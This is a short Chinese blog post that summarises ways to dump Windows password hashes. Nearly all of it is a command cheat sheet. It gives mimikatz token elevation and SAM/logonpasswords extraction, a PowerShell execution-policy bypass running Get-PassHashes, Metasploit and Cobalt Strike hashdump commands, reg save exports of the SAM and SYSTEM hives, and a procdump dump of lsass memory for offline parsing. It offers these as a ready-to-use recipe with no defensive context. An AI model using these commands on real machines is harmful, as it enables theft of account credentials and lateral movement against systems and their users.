hash抓取总结

抓hash方法

  1. mimikatz
privilege::debug
token::whoami
token::elevate
lsadump::sam

privilege::debug
sekurlsa::logonpasswords
  1. ps脚本
powershell -exec bypass Import-Module 
.\Get-PassHashes.PS1 
Get-PassHashes
  1. msf
run hashdump
use mimikatz
  1. cs
hashdump
wdigest
logonpasswords

离线抓取

  1. SAM文件
reg save hklm\sam sam.hiv
reg save hklm\system system.hiv
#使用mimikatz
lsadump::sam /sam:sam.hiv /system:system.hiv
  1. lsass.exe(注入lsass.exe进程,并从其内存中提取)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::mimidump lsass.dmp" "log" "sekurlsa::logonpasswords"
  1. 手工导出lsass.dmp文件
posted @   kalixcn  阅读(23)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· DeepSeek 开源周回顾「GitHub 热点速览」
· 物流快递公司核心技术能力-地址解析分单基础技术分享
· .NET 10首个预览版发布:重大改进与新特性概览!
· AI与.NET技术实操系列(二):开始使用ML.NET
· 单线程的Redis速度为什么快?
点击右上角即可分享
微信分享提示